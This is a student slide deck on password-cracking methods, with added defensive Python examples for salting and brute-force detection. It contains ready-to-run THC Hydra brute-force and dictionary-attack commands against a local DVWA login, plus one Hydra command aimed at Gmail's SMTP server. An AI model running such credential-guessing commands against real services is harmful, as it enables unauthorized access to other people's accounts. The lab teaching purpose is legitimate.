
Cyber Security Project: Password Cracking

This document provides information on password cracking techniques including dictionary attacks, brute force attacks, and rainbow table attacks. It discusses the tools Hydra and Kali Linux that can be used for password cracking experiments. The document demonstrates examples of using Hydra to conduct brute force and dictionary attacks against the Damn Vulnerable Web Application (DVWA). It concludes by noting some security best practices for passwords.

Uploaded by

Diksha Pandit

BALLERIO SIMONE

GALASSO EMANUELE

CYBER SECURITY PROJECT


PASSWORD CRACKING
Summary

• Password Cracking
• Experiments
• THC Hydra

Password Cracking features

• What is password cracking?
• Online Attack
• Offline Attack
• Dictionary Attack
• Brute Force
• Rainbow table
• Hybrid techniques

What is password cracking?

Password cracking is the process of attempting to gain unauthorized access to restricted systems using common passwords or algorithms that guess passwords.

How is a password stored?

Password → HASH FUNCTION → Hashed Password

Online VS Offline Cracking

Online: try a large number of username/password combinations against the login portal. Limited by the speed of the network.

Offline: try to get the hash of the password in an offline situation, and then crack it by trying to find the clear-text value that computes to that hash. Limited by the speed of the hacker’s machine.

Brute Force Attack
Try all the possible combinations of characters.

Depends only on the length of the password and on the system used.

We are 100% sure to find the password, but we don’t know how long the process will take.

Example Brute Force
PROBLEM
Let’s assume for a moment an environment where all systems have equal computing power, and that we have to find a password composed of only 8 alphanumeric characters.
How many attempts do we have to make in the worst case?

Consideration
Alphanumeric characters are: a...z, A...Z, 0...9 = 64 possibilities.
We already know the username.
The solution depends only on the length of the password.
Knowing the exact length of the password always simplifies the job.
Example Brute Force
SOLUTION

$64^8$ possible combinations (disposition with repetition: $D^{r}_{n,k} = n^{k}$, here with $n = 64$ and $k = 8$)

Dictionary Attack
Try all the strings in a pre-arranged list.

Depends on the complexity of the password and on whether it has an ordinary meaning.

There is less chance of arriving at a solution, but if we do, it is in a relatively short time.

Example Dictionary Attack

PROBLEM
Let’s consider a Dictionary Attack with the French dictionary, which contains roughly 135,000 words.

Solution
We can find a common French password by trying just 135,000 times.

Rainbow table Attack

It is a pre-computed dictionary of plain-text passwords and their corresponding hash values.

More than one text can produce the same hash, so it is not important to know what the original password really was.

Salting passwords is a common method of preventing rainbow table attacks.

Salting Passwords
SAME PASSWORD = SAME HASH STORED (figure: BOB and ALICE)

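The Bob and Alice case above, as an added Python example that is not part of the original slides: an unsalted fast hash stores identical values and falls to a pre-computed lookup table, while a per-user random salt with a slow KDF does not. The sample passwords, function names and the PBKDF2 iteration count are assumptions made for this illustration.

```python
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # assumed work factor for this example; tune to your hardware


def unsalted_hash(password):
    """What the slide warns about: a bare, fast hash with no salt."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_lookup_table(candidates):
    """Pre-computed hash -> plaintext dictionary, as the rainbow table slide describes."""
    return {unsalted_hash(p): p for p in candidates}


def salted_record(password, salt=None):
    """Return (salt, derived_key) using a per-user random salt and a slow KDF."""
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, key


def verify(password, salt, stored_key):
    """Recompute with the stored salt and compare in constant time."""
    return hmac.compare_digest(salted_record(password, salt)[1], stored_key)


def demo():
    # Constructed sample data: Bob and Alice chose the same password.
    users = {"bob": "sunshine1", "alice": "sunshine1"}
    table = build_lookup_table(["123456", "password", "sunshine1"])
    unsalted_db = {u: unsalted_hash(p) for u, p in users.items()}
    salted_db = {u: salted_record(p) for u, p in users.items()}
    return {
        "unsalted_identical": unsalted_db["bob"] == unsalted_db["alice"],
        "unsalted_recovered": [u for u, h in unsalted_db.items() if h in table],
        "salted_identical": salted_db["bob"][1] == salted_db["alice"][1],
        "salted_recovered": [u for u, (_, k) in salted_db.items() if k.hex() in table],
        "login_ok": verify("sunshine1", *salted_db["bob"]),
        "login_bad": verify("sunshine2", *salted_db["bob"]),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```
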
Hybrid Attack

Hybrid Dictionary

Background knowledge Dictionary

Maximize your chances of success

Experiments

Tools

• Kali Linux is an advanced penetration testing distribution

• Hydra is a parallelized login cracker

• Damn Vulnerable Web App

Kali Linux
Kali contains several hundred tools which are geared towards various information security tasks, such as:

• Penetration Testing
• Computer Forensics
• Security research
• Reverse Engineering

Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

Hydra

• Is very fast and flexible

• New modules are easy to add

• Shows how easy it would be to gain unauthorized access to a system remotely

DVWA (Damn Vulnerable Web App)
Ethical hackers test their skills and run tools in a legal environment.

• DVWA is the best platform for beginners and advanced users to prove their skills.

• This is the best place to do hacking.

• Helps web developers better understand the processes of securing web applications

Idea of Experiments

The experiments below use password cracking to discover the [user-password] pair of the access credentials for the DVWA application.

Brute Force

hydra -L user.txt -x 1:5:a -F -w 10 -V 127.0.0.1 http-get-form \
"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jk"

Brute Force

In this case it is not possible to show the result, because the number of password combinations is very high and the run would therefore take a long time.

Dictionary Attack

hydra -l admin -P rockyou.txt -e ns -F -u -w 10 -v -V 127.0.0.1 http-get-form \
"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jkls"

Dictionary Attack

hydra -l admin -P rockyou.txt -e ns -F -u -w 10 -v -V 127.0.0.1 http-get-form \
"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=hsn2d01480glgm9m2svtv9jkls"

Dictionary Attack

• Low: This security level is completely vulnerable and has no security measures at all.

• Medium: This setting is mainly to give an example to the user of bad security practices, where the developer has tried but failed to secure an application.

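The Hydra runs above send every guess as a GET request to /DVWA/vulnerabilities/brute/, so each attempt appears in the web server's access log. As an added example (not part of the original slides), the following Python detector flags clients that exceed a login-attempt rate; the log lines are constructed samples in Apache combined-log style, and the window, threshold and function names are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

LOGIN_PATH = "/DVWA/vulnerabilities/brute/"   # path used in the Hydra commands above
WINDOW = timedelta(seconds=10)                # assumed detection window
THRESHOLD = 5                                 # assumed max attempts per window
LINE_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*"')

def parse_attempt(line):
    """Return (ip, time, username) for a login attempt, else None."""
    m = LINE_RE.match(line)
    if not m or m["method"] != "GET":
        return None
    url = urlsplit(m["url"])
    query = parse_qs(url.query, keep_blank_values=True)
    if url.path != LOGIN_PATH or "password" not in query:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, query.get("username", [""])[0]

def detect_bruteforce(lines):
    """Flag client IPs exceeding THRESHOLD attempts in a sliding WINDOW (time-ordered input)."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    users = defaultdict(set)      # ip -> usernames tried (passwords are never kept)
    alerts = {}                   # ip -> (peak attempts in one window, usernames)
    for line in lines:
        attempt = parse_attempt(line)
        if attempt is None:
            continue
        ip, ts, user = attempt
        users[ip].add(user)
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > WINDOW:
            q.popleft()
        if len(q) > THRESHOLD:
            alerts[ip] = (max(len(q), alerts.get(ip, (0,))[0]), sorted(users[ip]))
    return alerts

def sample_log():
    """Constructed access-log lines: one noisy client, one normal user."""
    fmt = '{ip} - - [12/Mar/2024:10:00:{s:02d} +0000] "GET {path}?username=admin&password={pw}&Login=Login HTTP/1.1" 200 4321'
    noisy = [fmt.format(ip="192.0.2.10", s=i, path=LOGIN_PATH, pw=f"guess{i}") for i in range(8)]
    normal = [fmt.format(ip="192.0.2.20", s=30, path=LOGIN_PATH, pw="x"),
              '192.0.2.20 - - [12/Mar/2024:10:00:31 +0000] "GET /DVWA/index.php HTTP/1.1" 200 900']
    return noisy + normal
```

Calling detect_bruteforce(sample_log()) returns only the noisy client. Because the form uses GET, the guessed passwords themselves are written to the access log, which is a reason to treat such logs as sensitive.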
SMTP Attack

hydra smtp.gmail.com -l [email protected] -P temp -s 465 -S -V -f smtp

Other Possible Experiments

THC-Hydra supports many different services:

• Afp • Https-head • Ncp
• Cisco • Https-form-get • Nntp
• Cvs • Https-form-post • Oracle-listener
• Firebird • Imap • Pcanywhere
• Ftp • Smb • Pop3
• Http-get • Ldap2 • Postgres
• Http-head • Ldap3 • Rexecsnmp
• Http-proxy • Mssql • Smtp
• Https-get • Mysql • Telnet

CONCLUSION
• Use passwords that are at least 15 characters long.

• Don't use the same password for privileged user accounts between systems.

• Don't share it.

Thanks for the attention

How to test
VirtualBox: https://www.virtualbox.org/wiki/Downloads

Kali Linux: https://linoxide.com/distros/learn-method-install-kali-linux-virtualbox/

DVWA installation: https://medium.com/datadriveninvestor/setup-install-dvwa-into-your-linux-distribution-d76dc3b80357

If you have any type of problem during the installation, contact us and we will give you a .vdi file of the virtual machine with all the installations that you need.
How to test

Username: root

Password: toor

How to test

1. service apache2 start
2. service mysql start

How to test
http://127.0.0.1/DVWA/login.php

Username: admin
Password: password

How to test
Now you are on this page: [screenshot]

How to test
Right-click: 1, 2 (Select), 3 [numbered steps from the screenshot]

How to test
Test it and have fun:

Pure Brute Force:
hydra -L user.txt -x 1:5:a -e ns -F -u -w 10 -v -V 127.0.0.1 http-get-form \
"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=INSERT PHPSESSID"

Dictionary Attack:
hydra -l admin -P rockyou.txt -F -V 127.0.0.1 http-get-form \
"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=INSERT PHPSESSID"

Try: hydra -h for more information

ENJOY!